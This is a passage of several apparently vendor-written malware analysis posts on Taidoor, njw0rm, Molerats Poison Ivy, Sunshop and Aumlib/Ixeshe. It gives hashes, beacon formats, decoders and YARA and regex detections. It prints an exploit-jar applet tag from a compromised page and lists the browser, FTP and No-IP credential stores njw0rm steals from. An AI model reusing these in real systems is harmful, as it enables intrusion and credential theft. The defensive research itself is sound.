
Accept-Language: en-us

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)

Accept-Encoding: gzip, deflate


Connection: Keep-Alive



The content of the blog post between the markers “ctxugfbyyxyyyxyy” and “yxyyyxyyctxugfby” is encoded with base64 and encrypted using the RC4 cipher. The encryption key, which we discovered to be "asdfasdf", is also present in the contents of the base64 blog data in an encrypted form. The decrypted content of the blog post is a DLL file – that is in fact the Taidoor malware.
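The recovery steps described above (carve out the marked region, base64-decode it, then RC4-decrypt it with "asdfasdf") can be sketched as follows. Note that the real downloader recovers the key from the blog data itself; it is hard-coded here for illustration:

```python
import base64

START, END = "ctxugfbyyxyyyxyy", "yxyyyxyyctxugfby"

def rc4(key: bytes, data: bytes) -> bytes:
    # Standard RC4; encryption and decryption are the same operation.
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for b in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(b ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

def extract_payload(blog_text: str, key: bytes = b"asdfasdf") -> bytes:
    # Carve the text between the two markers, base64-decode it, then
    # RC4-decrypt it. A valid result is a DLL, i.e. it starts with b"MZ".
    start = blog_text.index(START) + len(START)
    end = blog_text.index(END, start)
    blob = base64.b64decode(blog_text[start:end])
    return rc4(key, blob)
```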


After the first-stage dropper downloads and decrypts the Taidoor malware, it then begins to connect to two CnC servers: ( and ( However, the network traffic (its “callback”) has been modified from the traditional version.


GET /default.jsp?vx=vsutnh191138F9744C HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)


Connection: Keep-Alive

Cache-Control: no-cache


Rather than having “[five characters].php”, this new file path ends in “.jsp” and may have any of the following file names:

  • process
  • page
  • default
  • index
  • user
  • parse
  • about
  • security
  • query
  • login

The new format is:

/[file name].jsp?[2 random characters]=[6 random characters][encrypted MAC address]
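A detection signature for this new callback format might look like the sketch below. The character classes are assumptions: the description above specifies only "2 random characters", "6 random characters", and a 12-character encrypted MAC address.

```python
import re

FILE_NAMES = "process|page|default|index|user|parse|about|security|query|login"

# Hypothetical signature for the new Taidoor callback URL format.
TAIDOOR_URL_RE = re.compile(
    r"/(?:" + FILE_NAMES + r")\.jsp\?[A-Za-z]{2}=[A-Za-z]{6}[0-9A-Fa-f]{12}$"
)

def is_taidoor_callback(path: str) -> bool:
    return bool(TAIDOOR_URL_RE.search(path))
```

The observed request `/default.jsp?vx=vsutnh191138F9744C` fits this shape.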

In addition to the use of other malicious Word documents (b0fd4d5fb6d8acb1ccfb54d53c08f11f), we have also seen this new Taidoor variant distributed as a Windows ScreenSaver file (.scr) posing as a PDF (d9940a3da42eb2bb8e19a84235d86e91) or a Word document (c4de3fea790f8ff6452016db5d7aa33f).




It remains unclear whether all of this Taidoor activity is related, or whether different groups are using the same malware for different purposes. The fact that Taidoor is not off-the-shelf malware that can simply be downloaded or purchased in the cybercrime underground suggests that all of this activity may be connected in some way.


So far, we have found only one large cluster of activity associated with this new Taidoor variant. This cluster, which made use of Yahoo Blogs, appears to have targeted entities in Taiwan. We found that traditional versions of Taidoor have also been using this infrastructure. [4]

Malware Connections

We found that another, possibly related, malware family known as “Taleret” is using the same technique that this Taidoor variant has used. We found that samples (such as 6cd1bf0e8adcc7208b82e1506efdba8d, 525fd346b9511a84bbe26eb47b845d89 and 5c887a31fb4713e17c5dda9d78aab9fe) connect to Yahoo Blogs in order to retrieve a list of CnC servers.


The content between the two markers “XXXXX” is encoded with base64 and encrypted with the RC4 cipher. The encryption key is “c37f12a0” in hex, and hardcoded in the malware.


We extracted the following CnC servers from these blog posts:

  • www.facebook.trickip.NET
  • www.braintrust.AlmostMy.COM

As with Taidoor, there appears to be a frequent association with Taiwan, in addition to a similar CnC naming scheme – such as (Taidoor) and (Taleret).


The Taidoor malware has been used to successfully compromise targets since 2008. This threat has evolved over time, and has recently leveraged Yahoo Blogs as a mechanism to drop the Taidoor malware as a “second stage” component. In addition, the well-known Taidoor network traffic pattern has been modified, likely as a new way to avoid network-based detection.



2. and

3. and reports of associated malware here and here

4. MD5 hashes of traditional Taidoor samples 811aae1a66f6a2722849333293cbf9cd 454c9960e89d02e4922245efb8ef6b49 5efc35315e87fdc67dada06fb700a8c7 bc69a262bcd418d194ce2aac7da47286

Njw0rm – Brother From the Same Mother

FireEye Labs has discovered an intriguing new sibling of the njRAT remote access tool (RAT) that one-ups its older "brother" with a couple of diabolically clever features. Created by the same author as njRAT —a freelance coder who goes by the moniker njq8 — the new njw0rm malware has the ability to spread using removable computer storage and can steal login credentials to a popular dynamic DNS service.

The older njRAT was first documented about a year ago by FireEye as Backdoor.LV. Most of the command-and-control (CnC) infrastructure associated with njRAT, like many of its targets, was based in the Middle East. The CnC servers associated with njw0rm are also based in the Middle East, though we have not yet seen njw0rm used in targeted attacks.

Njw0rm has the usual RAT features, but adds a key enhancement — it is designed to spread via removable devices such as USB drives. FireEye researchers have seen njw0rm delivered initially through malicious links in emails and using drive-by downloads on compromised websites. The malware aims to steal user credentials, execute commands, and receive future updates from the attacker.


Njw0rm is coded in Visual Basic script but requires AutoIt to build the dropper. It provides an attacker with common options such as designating a name for its binary, configuring its CnC servers, choosing whether to “melt” (delete) the binary after execution, and so on.


When you first start the builder, it asks you to assign a port for incoming traffic (1888 by default).


Control panel

The control panel contains a window for logging and another window with details of active infections.


The name of the infected machine is followed by the serial number of the %homedrive%. It also includes information on its location, OS (and service pack installations), removable storage devices present, and currently active windows.

The following functions are available from the control panel:


Data Theft

The Get Passwords command has the capability to steal passwords from three different sources:

  • FTP passwords stored under %appdata%\Filezilla\recentservers.xml
  • Chrome browser passwords in \Google\Chrome\User Data\Default\Login Data\
  • Account credentials for the No-IP dynamic DNS service by reading the registry key at HKLM\SOFTWARE\Vitalwerks\DUC and base64-decoding it

The credentials stored inside Google Chrome’s Web browser are decrypted locally using the CryptUnprotectData() function provided by Crypt32.dll. This API enables an application to decrypt Triple-DES encrypted passwords as long as they are encrypted with the same logon credentials.

The ability to steal No-IP credentials is unique. Many threat actors use dynamic DNS domains for their infrastructure. So an attacker with stolen No-IP credentials could use the service to perform reconnaissance or target other systems.

Callback Communication

The Njw0rm bot connects to the CnC server and waits for commands. If no command is received, the worm sends the following information to a hard-coded domain:port pair every two seconds.


The above code roughly translates to:

“lv” + 0njxq80 + name_serial + 0njxq80 + Kernel32.dll.GetLocaleInfo()+ 0njxq80 + OS info + 0njxq80 + worm version + 0njxq80 + removable drive available + 0njxq80 + title of active window

Like njRAT, njw0rm uses the "lv" keyword and "0njxq80" as a field separator.
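Parsing a beacon of this shape is a matter of splitting on the delimiter. The field names below follow the rough translation above and are our own labels, not names taken from the malware:

```python
DELIM = "0njxq80"

def parse_njw0rm_beacon(beacon: str):
    # Sketch of the beacon layout described above: an "lv" keyword
    # followed by fields separated by the "0njxq80" delimiter.
    fields = beacon.split(DELIM)
    if not fields or fields[0] != "lv":
        return None
    names = ["keyword", "name_serial", "locale", "os_info",
             "worm_version", "removable_drive", "active_window"]
    return dict(zip(names, fields))
```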


The Worm Aspect

Njw0rm constantly checks for removable devices present on the host. If a removable drive’s status is “Ready” and it has more than 1024 megabytes free, njw0rm creates a hidden My Pictures directory (if it doesn't already exist). It then gets a list of 10 folders on the removable drive, hides those 10 folders, and creates shortcut links with the same names for each of them — all pointing to the malware executable. When unsuspecting users click on one of the shortcuts to open what they think is a familiar folder, they execute the worm instead.
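A defensive sketch (our illustration, not part of the malware) can flag this trick by looking for .lnk files whose base names collide with folder names on the same drive:

```python
def suspicious_shortcut_pairs(entries):
    # `entries` maps a directory listing name to either "dir" or "file".
    # Flag every .lnk whose base name shadows a folder in the same listing,
    # the hallmark of the folder-hiding trick described above.
    dirs = {name for name, kind in entries.items() if kind == "dir"}
    return sorted(
        name[:-4] for name, kind in entries.items()
        if kind == "file" and name.lower().endswith(".lnk") and name[:-4] in dirs
    )
```

In practice the listing would come from walking the removable drive with hidden entries included.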


Connections to njRAT

Looking at the comments section of the code, researchers can conclude that njw0rm is coded by njq8, the author who also created njRAT. Although njw0rm’s communications are not base64 encoded, it uses the same keyword "lv" at the beginning of every communication and “0njxq80” as a delimiter instead of “|”, two features that are identical to njRAT’s communication.

The malware's author is prolific. According to his profile, he lives in Kuwait and is a coder for hire.

Based on the comments in the source code, njw0rm was last updated on May 16th with version 0.3.3a. We have seen versions ranging from 0.2 – 0.4d in the wild. The newer version likely includes bot-killer functionality that was left unfinished in 0.3.3a.

CnC Information

We have seen communications back to the following domains and ports:  1888  18888  81  1888  18  1888  1888  1888  8888  4040 8888

Geolocations of CnC

Most of njw0rm's CnC infrastructure is hosted in the Middle East, just like njRAT's, with a few exceptions.



The Njw0rm RAT is clearly authored by the same person who wrote njRAT. Like njRAT, most of the njw0rm CnC infrastructure is also hosted in the Middle East. The callback structure is also similar to njRAT. Currently, the worm does not appear to be used in a targeted fashion. But based on the callback data, njw0rm is evolving quickly — so expect to see more of it in the future.

(Special thanks to Thoufique Haq for his help with this research.)

File hashes

02b32f094ddc1b5d0c0ab86a5fae7c91 02dc77b3ae7a17a6720eec9624b24ae9 02e144a10e8f3a24a335a96cd69f8086 053702add48f4455088798fff2b4e690 05b5008acd534f4e419902c85f169531 07c65bd8926cf6c249bc04470b555c65 08f240f494a5e4f2cbfb9f764d1738e6 0f828b31bb91fcdcf1533ed7cd3e3313 110d0b6e29d84dd2f690703197082743 12f679546ada9d65c21a8e879128139d 13977ef247db77c11b9b8f407c9f3f6c 1c448c5488ac4a391f6fae0a5880adaf 1cb5a011c3888aa981d8f3cc0c74fc2e 21af26854fa5318d1f8787ebbc9dce20 253647d1ee71c19c136db94b9f7af3d2 2cf983063f2a33685f34ab53d076d2ce 2dc7b434520365c6ab3f5bdadcb84765 2fe7df0c84f6bb0d53922bbe79123295 42f549140f5fec8f63c118d649b1659f 4c60493b14c666c56db163203e819272 57d8b563b587aecee18387a016f49710 5c12b6694032134f213a51df047c5968 7717e996de4d1444c76b3ab4432027b2 7e5c0b55917721a7463b00c89c8f3154 807e6783a4212e1fb20a6f1f0a7b006b 86022d7f987e9cf54fad35a89c3d9e84 908634d98e166031e0904575ed7f4e2e 93d8dc5ff775ef8d9f9355e8e516e232 9c25d1a88bf96f73207a57ccb184d993 a36117133263dc538d2b9291835d94e9 a62b3a47e485fda57d5f183ebb237683 a89c76bce3d8eab6451da7d579bbd9fa a90a254d547042cd2936f9c89359c442 ab6e0b3d0cf57c507935578987c289c3 b0e1d20accd9a2ed29cdacb803e4a89d b412222c50bd51b4770245cfee71346b ba2952386cd8295ca69665b65a24e635 bab466ab747c94e55d0c1685404cc548 f06c6fd7ee79f035b0b683364d5f2af2 f0abdb8084a416e8353bc520abe0471b f3ae62b63f3b78b9c0be30d0ffd10592 f6b31d4abeb50db38093003bd93dc02e f863f3878ebd2e449beb78dc214380ab ff573fc5a7c9b12fa15c984eb0228a64

Operation Molerats: Middle East Cyber Attacks Using Poison Ivy

Don't be too hasty to link every Poison Ivy-based cyber attack to China. The popular remote access tool (RAT), which we recently detailed on this blog, is being used in a broad campaign of attacks launched from the Middle East, too.

First, some background:

In October 2012, malware attacks against Israeli government targets grabbed media attention as officials temporarily cut off Internet access for the entire police force and banned the use of USB memory sticks. [1] Security researchers subsequently linked these attacks to a broader, yearlong campaign that targeted not just Israelis but Palestinians as well [2] and, as was discovered later, even the U.S. and UK governments. [3] Further research revealed a connection between these attacks and members of the so-called “Gaza Hackers Team.” We refer to this campaign as “Molerats.”

Threat actors in specific geographic regions may prefer one RAT to another, but many RATs are publicly available and used by a variety of threat actors, including those involved in malware-based espionage.

In 2012, the Molerats attacks appeared to rely heavily on the XtremeRAT, a freely available tool that is popular with attackers based in the Middle East. [5] But the group has also used Poison Ivy (PIVY), a RAT more commonly associated with threat actors in China [6] — so much so that PIVY has, inaccurately, become synonymous with all APT attacks linked to China.

This blog post analyzes several recent Molerats attacks that deployed PIVY against targets in the Middle East and in the U.S. We also examine additional PIVY attacks that leverage Arabic-language content related to the ongoing crisis in Egypt and the wider Middle East to lure targets into opening malicious files. [7]

Enter Poison Ivy

We observed several attacks in June and July 2013 against targets in the Middle East and the U.S. that dropped a PIVY payload that connected to command-and-control (CnC) infrastructure used by the Molerats attackers.


The malware sample we analyzed was unusual for two reasons:

  • It referenced an article that was published last year
  • The compile time for the dropped binary was also dated from last year, seemingly consistent with the referenced article. But this malware was signed, and — in contrast to the compile time, which can be faked — the signing time on its certificate was much more recent: Monday, July 08, 2013 1:45:10 A.M.

Here are the file details:

Hamas shoot down Israeli F-16 fighter jet by modern weapon in Gaza sea.doc- - - - - - - - - - - -.scr

MD5: 7084f3a2d63a16a191b7fcb2b19f0e0d


This malware was signed with a forged Microsoft certificate similar to previous XtremeRAT samples. But the serial number (which is often reused by attackers, enabling FireEye researchers to link individual attacks, including those by the Molerats) is different this time.


The malware dropped an instance of PIVY with the following configuration:


ID: F16 08-07-2013


DNS/Port: Direct:,

Proxy DNS/Port:

Proxy Hijack: No

ActiveX Startup Key:

HKLM Startup Entry:

File Name:

Install Path: C:\Documents and Settings\Admin\Local Settings\Temp\morse.exe

Keylog Path: C:\Documents and Settings\Admin\Local Settings\Temp\morse

Inject: No

Process Mutex: gdfgdfgdg

Key Logger Mutex:

ActiveX Startup: No

HKLM Startup: No

Copy To: No

Melt: No

Persistence: No

Keylogger: No

Password: !@#GooD#@!


We collected additional PIVY samples that had the same password or linked to CnC infrastructure at a common IP address (or both). We observed three PIVY passwords (another potential identifier) used in the attacks: “!@#GooD#@!”, “!@#Goood#@!” and “admin100”.
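This kind of linking (grouping samples that share a PIVY password or a CnC IP address) can be sketched as a simple union-find over shared indicators. The data in the usage test is illustrative, not observed:

```python
from collections import defaultdict

def cluster_samples(samples):
    # `samples` maps a sample identifier to a set of indicator strings
    # (passwords, CnC IPs). Samples sharing any indicator are merged
    # into one cluster via union-find.
    parent = {sid: sid for sid in samples}

    def find(x):
        while parent[x] != x:
            parent[x] = parent[parent[x]]  # path halving
            x = parent[x]
        return x

    by_indicator = defaultdict(list)
    for sid, indicators in samples.items():
        for ind in indicators:
            by_indicator[ind].append(sid)
    for group in by_indicator.values():
        for other in group[1:]:
            parent[find(other)] = find(group[0])

    clusters = defaultdict(set)
    for sid in samples:
        clusters[find(sid)].add(sid)
    return sorted(sorted(c) for c in clusters.values())
```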

Additional Samples with Middle Eastern Themes

We also found a PIVY sample used by this group that leveraged what are known as key files instead of passwords. The PIVY builder allows operators to load .pik files containing a key to secure communications between the compromised computer and the attacker's machine. By default, PIVY secures these communications with the ASCII text password "admin" — when the same non-default password appears in multiple attacks, researchers can conclude that the attacks are related.

The PIVY sample in question had an MD5 hash of 9dff139bbbe476770294fb86f4e156ac and communicated with a CnC server at over port 443. The key file used to secure communications contained the following ASCII string ‘Password (256 bits):\x0d\x0aA9612889F6’ (where \x0d\x0a represents a line break).


The 9dff139bbbe476770294fb86f4e156ac sample dropped a decoy document in Arabic that included a transcript of an interview with Salam Fayyad, the former Prime Minister of the Palestinian National Authority.

The sample 16346b95e6deef9da7fe796c31b9dec4 was also seen communicating with over port 443. This sample appears to have been delivered to its targets via a link to a RAR archive labeled Ramadan.rar (fc554a0ad7cf9d4f47ec4f297dbde375) hosted at the Dropbox file-sharing website.


The sample a8714aac274a18f1724d9702d40030bf dropped a decoy document in Arabic that contained a biography of General Abdel Fattah el-Sisi, the Commander-in-Chief of the Egyptian Armed Forces.


A recent sample (d9a7c4a100cfefef995785f707be895c) used protests in Egypt to entice recipients to open a malicious file.


Another sample (b0a9abc76a2b4335074a13939c59bfc9) contained a decoy with a grim picture of Fadel Al Radfani, who was the adviser to the defense minister of Yemen before he was assassinated.

Although we are seeing Egyptian- and Middle Eastern-themed attacks using decoy content in Arabic, we cannot determine the intended targets of all of these attacks.

Delivery Vector

We believe that the Molerats attacker uses spear phishing to deliver weaponized RAR files containing their malicious payloads to their victims in at least two different ways. The Molerats actor will in some cases attach the weaponized RAR file directly to their spear-phishing emails. We also believe that this actor sends spear-phishing emails that include links to RAR files hosted on third-party platforms such as Dropbox.

In one such example we found the following link was used to host Ramadan.rar (fc554a0ad7cf9d4f47ec4f297dbde375):


CnC Infrastructure

We have found 15 PIVY samples that can be linked through common passwords, common CnC domain names, and common IP addresses to which the CnC domains resolve. The CnC servers for this cluster of activity are:


Two of the domain names ( and that were used as CnCs for PIVY were both documented as XtremeRat CnCs that were used in previous attacks. [8]


We focused on these domains and their IP addresses — which they had in common with In addition, we added the well-known CnCs and used in previously documented attacks.

By observing changes in DNS resolution that occurred within the same timeframe, we were able to ensure that the passive DNS data we collected was the same. Interestingly, we also found that the domains often shifted to a new IP address over time.

[Table: passive DNS resolutions for the PIVY CnC domains (columns: CnC, Date, IP), with resolution timestamps between 2013-07-10 and 2013-08-10]

One interesting discovery concerns a sample (5b740b4623b2d1049c0036a6aae684b0) that was first seen by VirusTotal on September 14, 2012. This date is within the timeframe of the original XtremeRat attacks, but the payload in this case was PIVY. This indicates that the attackers have been using PIVY in addition to XtremeRat for longer than we had originally believed.


We do not know whether using PIVY is an attempt by those behind the Molerats campaign to frame China-based threat actors for their attacks or simply evidence that they have added another effective, publicly-available RAT to their arsenal. But this development should raise a warning flag for anyone tempted to automatically attribute all PIVY attacks to threat actors based in China. The ubiquity of off-the-shelf RATs makes determining those responsible an increasing challenge.

The ongoing attacks are also heavily leveraging content in Arabic that uses conflicts in Egypt and the wider Middle East to lure targets into opening malicious files. But we have no further information about the exact targets of these Arabic lures.

As events on the ground in the Middle East — and in Egypt in particular — receive international attention, we expect the Molerat operators to continue leveraging these headlines to catalyze their operations.







6. /content/dam/legacy/resources/pdfs/fireeye-poison-ivy-report.pdf

7. The Molerats group also uses additional RATs such as XtremeRat, Cerberus, and Cybergate, but we have focused on their use of PIVY in this blog.


Yara Signature

This Yara signature can be used to locate signed samples that have the new certificate serial numbers used by Molerats.


rule Molerats_certs
{
    meta:
        author = "FireEye Labs"
        description = "This rule detects code signed with certificates used by the Molerats actor"
    strings:
        $cert1 = {06 50 11 A5 BC BF 83 C0 93 28 16 5E 7E 85 27 75}
        $cert2 = {03 e1 e1 aa a5 bc a1 9f ba 8c 42 05 8b 4a bf 28}
        $cert3 = {0c c0 35 9c 9c 3c da 00 d7 e9 da 2d c6 ba 7b 6d}
    condition:
        1 of ($cert*)
}



















Poison Ivy: Assessing Damage and Extracting Intelligence

Today, our research team is publishing a report on the Poison Ivy family of remote access tools (RATs) along with a package of tools created to work as a balm of sorts — naturally, we’re calling the package “Calamine.”

In an era of sophisticated cyber attacks, you might wonder why we’re even bothering with this well-known, downright ancient pest. As we explain in the paper, dismissing Poison Ivy could be a costly mistake.

RATs may well be the hacker’s equivalent of training wheels, as they are often regarded in IT security circles. But despite their reputation as a software toy for novice “script kiddies,” RATs remain a linchpin of many sophisticated cyber attacks and are used by numerous threat actors.

Requiring little technical savvy, RATs offer unfettered access to compromised machines. They are deceptively simple — attackers can point and click their way through the target’s network to steal data and intellectual property. But they are often delivered as a key component of coordinated attacks that use previously unknown (zero-day) software flaws and clever social engineering.

Even as security professionals shrug off the threat, the presence of a RAT may in itself indicate a targeted attack known as an advanced persistent threat (APT). Unlike malware focused on opportunistic cybercrime (typically conducted by botnets of compromised machines), RATs require a live person on the other side of the attack.

Poison Ivy has been used in several high-profile malware campaigns, most infamously, the 2011 compromise of RSA SecurID data. The same year, Poison Ivy powered a coordinated attack dubbed “Nitro” against chemical makers, government offices, defense firms, and human-rights groups.

We have discovered several nation-state threat actors actively using Poison Ivy, including the following:

  • admin@338 — Active since 2008, this actor mostly targets the financial services industry, though we have also seen activity in the telecom, government, and defense sectors.
  • th3bug — First detected in 2009, this actor targets a number of industries, primarily higher education and healthcare.
  • menuPass — Also first detected in 2009, this actor targets U.S. and overseas defense contractors.

Understanding why Poison Ivy remains one of the most widely used RATs is easy. Controlled through a familiar Windows interface, it offers a bevy of handy features: key logging, screen capture, video capturing, file transfers, password theft, system administration, traffic relaying, and more.

Here is how a typical Poison Ivy attack works:

  1. The attacker sets up a custom PIVY server, tailoring details such as how Poison Ivy will install itself on the target computer, what features are enabled, the encryption password, and so on.
  2. The attacker sends the PIVY server installation file to the targeted computer. Typically, the attacker takes advantage of a zero-day flaw. The target executes the file by opening an infected email attachment, for example, or visiting a compromised website.
  3. The server installation file begins executing on the target machine. To avoid detection by anti-virus software, it downloads additional code as needed through an encrypted communication channel.
  4. Once the PIVY server is up and running on the target machine, the attacker uses a Windows GUI client to control the target computer.

Poison Ivy is so widely used that security professionals have a harder time tracing attacks that use the RAT to any particular attacker.

We hope to eliminate some of that anonymity with the Calamine package. The package, which enables organizations to easily monitor Poison Ivy’s behavior and communications, includes these components:

ChopShop[1] is a new framework developed by the MITRE Corporation for network-based protocol decoders that enable security professionals to understand actual commands issued by human operators controlling endpoints. The FireEye PIVY module for ChopShop decrypts Poison Ivy network traffic.

PyCommands, meanwhile, are Python scripts that automate tasks for Immunity Debugger, a popular tool for reverse-engineering malware binaries.[2] The FireEye PyCommand script dumps configuration information from a running PIVY process on an infected endpoint, which can provide additional telemetry about the threat actor behind the attack.

FireEye is sharing the Calamine tools with the security community at large under the BSD 2-Clause license[3] for both commercial and non-commercial use worldwide.

By tracking the PIVY server activity, security professionals can find these telltale indicators:

  • The domains and IPs used for CnC
  • The attacker’s PIVY process mutex
  • The attacker’s PIVY password
  • The launcher code used in the malware droppers
  • A timeline of malware activity

The FireEye report explains how Calamine can connect these and other facets of the attack. This evidence is especially useful when it is correlated with multiple attacks that display the same identifying features. Combining these nitty-gritty details with big-picture intelligence can help profile threat attackers and enhance IT defenses.

Calamine may not stop determined APT actors from using Poison Ivy. But it can complicate their ability to hide behind this commodity RAT.

Full details are available here:

[1] ChopShop is available for download at

[2] Immunity Debugger is available at

[3] For more information about the BSD 2-Clause License, see the Open Source Initiative’s template at

The Sunshop Campaign Continues

We recently detected what we believe is a continuation of the Sunshop campaign that we first revealed on May 20, 2013.

This follow-on to the Sunshop campaign started on July 17, 2013. In this latest wave the attackers inserted malicious redirects into a number of websites – at least two of which were also compromised in the May 2013 edition of this campaign. The most prominent sites compromised in this round of the campaign were maintained by a Human Rights organization and an organization involved in science and technology policy development.

The compromised websites redirected victims to www[.]vwalls[.]com/maxi/enough/wildpost/files/2977.html. This page was last modified on July 17, 2013 at 09:51:01 GMT and contained the following code:

<applet archive="MnDK6AQJbV9qSo15.jar" code="Xxploit.class" width="1" height="1">


A .jar file with the same filename and md5 hash of 8b88de786a219340ff04bc53de196f46 was uploaded to on July 19, 2013. This malicious .jar exploited CVE-2013-2423 and dropped an interesting variant of Trojan.APT.9002.

The dropped payload had an MD5 hash of f4ba5fd0a4f32f92aef6d5c4d971bf14 and was compiled on June 25, 2013. This Trojan.APT.9002 variant called back to appupdate[.]myvnc[.]com. This domain resolved to – one of the same command and control IP addresses used in the Sunshop campaign.

A related .jar file with the filename fiUJ3OTjBWZEUH8H.jar (md5: 04ad4f479997ca7bf8de216a67e23972) was also found. This jar file was first uploaded to on July 17, 2013. This malicious jar also exploited CVE-2013-2423 and dropped a modified 9002 RAT payload with the md5 53c5570178403b6fbb423961c3831eb2. This variant called back to intelupdate[.]hopto[.]org which resolved to It is possible that fiUJ3OTjBWZEUH8H.jar was used first then swapped out for MnDK6AQJbV9qSo15.jar for this instantiation of the Sunshop campaign.


The typical 9002 variant sends the ASCII characters ‘9002’ as the first 4 bytes of its communications back to the command and control server. In contrast, this modified variant sent the ASCII characters ‘0113’ as the first 4 bytes back to its command and control server.

Variant | Hex-encoded beacon between victim and C2
9002 | 39 30 30 32 0c 00 00 00 08 00 00 00 19 ff ff ff ff 00 00 00 00 11 00 00
0113 | 30 31 31 33 0c 00 00 00 08 00 00 00 19 ff ff ff ff 00 00 00 00 11 00 00

This change, while seemingly minor, would evade signatures that looked for the entire 24-byte string of the beacon packet. Bytes 5 through 24 are constant across both variants and are therefore better candidates for signatures. FireEye detects both variants as Trojan.APT.9002.
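A matcher built on that observation can be sketched in Python: key on the constant 20-byte tail (bytes 5 through 24, taken from the beacon table above) rather than the full 24-byte string, so both variant tags are caught. This is illustrative only, not a production signature.

```python
# Sketch: match the 9002-family beacon on its constant tail (bytes 5-24),
# ignoring the 4-byte variant tag ('9002' or '0113') at the front.
CONSTANT_TAIL = bytes.fromhex("0c0000000800000019ffffffff00000000110000")

def is_9002_beacon(packet: bytes) -> bool:
    """True if the first 24 bytes look like a 9002-family beacon."""
    return len(packet) >= 24 and packet[4:24] == CONSTANT_TAIL

# The two observed variants: ASCII '9002' is 39 30 30 32, '0113' is 30 31 31 33.
beacon_9002 = b"9002" + CONSTANT_TAIL
beacon_0113 = b"0113" + CONSTANT_TAIL
```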


We are almost certain that the same actors responsible for the original Sunshop campaign executed these most recent attacks. We observed the following commonalities between the two attack cycles:

- At least two of the same strategic websites were compromised

- A variant of the same Trojan.APT.9002 malware was dropped

- The same c2 IP,, was used in both attacks

While it is unclear what prompted the modification of the Trojan.APT.9002 backdoor, it is possible that the adversary felt this modification would increase the attack's chances of success.

It is also unclear how easy it is for the adversary to implement this change in the network protocol. This change could in theory be enabled through an easy-to-use GUI builder, or it could be as complex as making changes to the source code. The level of complexity of this change and the availability of either a builder or the source code will dictate how often we would expect to see similar changes in this tool.

This example of evasion at the network level also demonstrates the importance of crafting robust signatures that will survive the changes in techniques, tactics and procedures made by the adversary.

Survival of the Fittest: New York Times Attackers Evolve Quickly

The attackers behind the breach of the New York Times’ computer network late last year appear to be mounting fresh assaults that leverage new and improved versions of malware.

The new campaigns mark the first significant stirrings from the group since it went silent in January in the wake of a detailed expose of the group and its exploits — and a retooling of what security researchers believe is a massive spying operation based in China [1].

The newest campaign uses updated versions of Aumlib and Ixeshe.

Aumlib, which for years has been used in targeted attacks, now encodes certain HTTP communications. FireEye researchers spotted the malware when analyzing a recent attempted attack on an organization involved in shaping economic policy.

And a new version of Ixeshe, which has been in service since 2009 to attack targets in East Asia, uses new network traffic patterns, possibly to evade traditional network security systems.

The updates are significant for both of the longstanding malware families; before this year, Aumlib had not changed since at least May 2011, and Ixeshe had not evolved since at least December 2011.


Cybercriminals are constantly evolving and adapting in their attempts to bypass computer network defenses. But larger, more successful threat actors tend to evolve at a slower rate.

As long as these actors regularly achieve their objective (stealing sensitive data), they are not motivated to update or rethink their techniques, tactics, or procedures (TTPs). These threat actors’ tactics follow the same principles of evolution – successful techniques propagate, and unsuccessful ones are abandoned. Attackers do not change their approach unless an external force or environmental shift compels them to. As the old saying goes: If it ain’t broke, don’t fix it.

So when a larger, successful threat actor changes up tactics, the move always piques our attention. Naturally, our first priority is ensuring that we detect the new or altered TTPs. But we also attempt to figure out why the adversary changed — what broke? — so that we can predict if and when they will change again in the future.

We observed an example of this phenomenon around May. About four months after The New York Times publicized an attack on its network, the attackers behind the intrusion deployed updated versions of their Backdoor.APT.Aumlib and Backdoor.APT.Ixeshe malware families [2].

The previous versions of Aumlib had not changed since at least May 2011, and Ixeshe had not evolved since at least December 2011.

We cannot say for sure whether the attackers were responding to the scrutiny they received in the wake of the episode. But we do know the change was sudden. Retooling the TTPs of a large threat actor is a formidable undertaking, akin to turning a battleship: it requires recoding malware, updating infrastructure, and possibly retraining workers on new processes.

The following sections detail the changes to Backdoor.APT.Aumlib and Backdoor.APT.Ixeshe.


Aumlib has been used in targeted attacks for years. Older variants of this malware family generated the following POST request:

POST /bbs/info.asp HTTP/1.1

Data sent via this POST request transmitted in clear text in the following structure:


A recently observed malware sample (hash value 832f5e01be536da71d5b3f7e41938cfb) appears to be a modified variant of Aumlib.

The sample, which was deployed against an organization involved in shaping economic policy, was downloaded from the following URL:

status[.]acmetoy[.]com/DD/myScript.js or status[.]acmetoy[.]com/DD/css.css

The sample generated the following traffic:


This output reveals the following changes when compared with earlier variants:

  • The POST URI is changed to /bbs/search.asp (as mentioned, earlier Aumlib variants used a POST URI of /bbs/info.asp.)
  • The POST body is now encoded.

Additional requests from the sample generated the following traffic:


These subtle changes may be enough to circumvent existing IDS signatures designed to detect older variants of the Aumlib family.

The sample 832f5e01be536da71d5b3f7e41938cfb shares code with an older Aumlib variant with the hash cb3dcde34fd9ff0e19381d99b02f9692. The sample cb3dcde34fd9ff0e19381d99b02f9692 connected to documents[.]myPicture[.]info and www[.]documents[.]myPicture[.]info and as expected generated the a POST request to /bbs/info.asp.


Ixeshe has been used in targeted attacks since 2009, often against entities in East Asia [3]. Although the network traffic is encoded with a custom Base64 alphabet, the URI pattern has been largely consistent:

/[ACD] [EW]S[Numbers].jsp?[Base64]
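One way to express that URI pattern as a concrete regex is sketched below. The exact character classes are an assumption derived from the shorthand above (treating the stray space in "[ACD] [EW]S" as an artifact, and "[Base64]" as standard Base64 characters):

```python
# Sketch: the historical Ixeshe URI pattern as a regex. Assumes one of
# A/C/D, then E or W, then a literal S, digits, ".jsp?", and Base64 data.
import re

IXESHE_URI = re.compile(r"^/[ACD][EW]S\d+\.jsp\?[A-Za-z0-9+/=]+$")

def matches_ixeshe_uri(uri: str) -> bool:
    return IXESHE_URI.match(uri) is not None
```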

We analyzed a recent sample that appears to have targeted entities in Taiwan, a target consistent with previous Ixeshe activity.


This sample (aa873ed803ca800ce92a39d9a683c644) exhibited network traffic that does not match the earlier pattern and therefore may evade existing network traffic signatures designed to detect Ixeshe related infections.


